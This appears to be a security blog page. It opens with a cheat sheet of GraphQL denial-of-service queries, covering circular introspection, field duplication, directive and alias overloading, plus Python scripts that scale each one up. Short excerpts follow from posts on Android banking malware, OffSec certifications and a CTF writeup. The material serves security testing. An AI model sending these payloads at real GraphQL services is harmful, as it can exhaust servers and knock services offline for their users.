GraphQL DOS Cases
GraphQL Introspection Enabled Query
{"query": "query { __schema { types { name fields { name } } } }"}
GraphQL Introspection-based Circular DOS Query
{"query": "query { __schema { types { fields { type { fields { type { fields { type { fields { type { name } } } } } } } } } } }"}
Query Creator for Introspection-based Circular:
# Initialize the base text and the number of repetitions
base_text = "fields { type {"
end_text = "}}"
repetitions = 1000
# Create the result string by repeating the pattern
result = "__schema { types { " + (base_text * repetitions) + " name " + (end_text * repetitions) + " }"
# Print the result string
print(result)
GraphQL Field Duplication DOS Query-1
{"query": "query { __typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n} "}
Query Creator for Field Duplication:
text = "__typename \\n"
repetitions = 1000
# Create the result string by repeating the text with a space as separator
result = (text + " ") * repetitions
# Print the result string
print(result)
GraphQL Directives Overloading DOS Query-1
{"query": "query { __typename @aa@aa@aa@aa@aa@aa@aa@aa@aa@aa}"}
Query Creator for Directives Overloading:
# Initialize the text and the number of repetitions
text = "@aa"
repetitions = 1000
# Create the result string by repeating the text
result = text * repetitions
# Print the result string
print(result)
GraphQL Alias Overloading DOS Query-1
{"query": "query { alias0:__typename \nalias1:__typename \nalias2:__typename \nalias3:__typename \nalias4:__typename \nalias5:__typename \nalias6:__typename \nalias7:__typename \nalias8:__typename \nalias9:__typename \nalias10:__typename \nalias11:__typename \nalias12:__typename \nalias13:__typename \nalias14:__typename \nalias15:__typename \nalias16:__typename \nalias17:__typename \nalias18:__typename \nalias19:__typename \nalias20:__typename \nalias21:__typename \nalias22:__typename \nalias23:__typename \nalias24:__typename \n}"}
Query Creator for Alias Overloading:
# Initialize the result string
result = ""
# Loop from 0 to 999 to generate aliases
for i in range(1000):
result += f"alias{i}:__typename \\n"
# Print the result string
print(result)
Android – Bankacılık Zararlı Yazılım Analizi [ANUBIS]
Android dünyasında zararlı yazılımların sayısı gün geçtikçe artmaktadır. Bu zararlı yazılımlar Google Play Store’dan da yayılmaktadır. Evet, güvenli diye nitelendirdiğimiz Play Store’un koruması bazı zamanlarda yetersiz kalabilmektedir.
Güvenlik uzmanları bu uygulamaları ortaya çıkarmak, tespit etmek için çalışsa da bazen iş işten geçmiş olabilmektedir. Bu zararlı uygulamalar(dropper) genel olarak farklı bir zararlı indirerek bankacılık uygulamalarını hedef almaktadır.
Son zamanlarda, Türkiye’yi de hedef alan bu zararlı yazılımların sayısında büyük artış yaşandı. Bu analizde de benzer bir uygulamanın indirdiği “Anubis II” türevi olan bir zararlı uygulamayı inceleyeceğiz.
Testlere başladığımız zaman zararlı uygulamanın hash bilgisi virustotal vb. yerlerde bulunmuyordu. Yeni bir zararlı türeviydi.
VirusTotal Linki;
Offensive Security – Eğitim ve Sınav İncelemeleri (OSWE,OSCE,OSCP,OSWP)
Selamlar,
Bu yazıda, güvenlik sektöründe saygınlığı kabul görmüş olan Offensive Security eğitimleri ve sertifika sınavlarındaki tecrübelerimi anlatmaya çalışacağım.
Sanal ortamlarda OffSec’in Türkiye’den başvuru almadığına dair bazı asılsız haberlerde mevcut, bunlara kulak asmayın. Kayıt olmak için yalnızca kurumsal e-mail adresi ve ücretin ödenmesi gerekli 🙂
Kayıt olma süreci hakkında detaylı bilgi OffSec’in kendi sitesinde de mevcut zaten.
OffSec online olarak dört tip eğitim ve sertifika sınavı sunmaktadır. Bunlar;
- Offensive Security Wireless Attacks (WiFu)
- Offensive Security Wireless Professional (OSWP)
- Penetration Testing with Kali Linux (PWK)
- Offensive Security Certified Professional (OSCP)
- Cracking the Perimeter (CTP)
- Offensive Security Certified Expert (OSCE)
- Advanced Web Attacks And Exploitation (AWAE)
- Offensive Security Web Expert (OSWE)
Anlatım sıramız kolaydan zora şeklinde olacak , OSWP –> OSCP –> OSCE –> OSWE 🙂
Deloitte DE Hacking Challenge (Prequals) – CTF Writeup
Hi,
Deloitte Deutschland recently organized a nice* capture the flag challange.
This article contains the solution of the questions in this competition.
Here is the CTF page;
https://portal.hackazon.org/
The content of the CTF is as follows ;
Sahte HGS Mobil Uygulaması – Android Zararlı Yazılımı Analizi
Selamlar,
Sosyal medyada karşılaşmışsınızdır; sahte bir HGS uygulaması türemiş, kredi kartı bilgilerini çalıyor deniyordu. Başka bir habere göre de PTT’nin Google Play hesabı hacklenmiş, sahte uygulama bu hesap aracılığıyla dağıtılıyor diye değişik haberler vardı. Öyle ki, bu uygulamanın reklamını haber sitesinde bile gördüm.
Araştırma yaptığımda sahte diye belirtilen ilgili uygulama adresine eriştim;
uceka 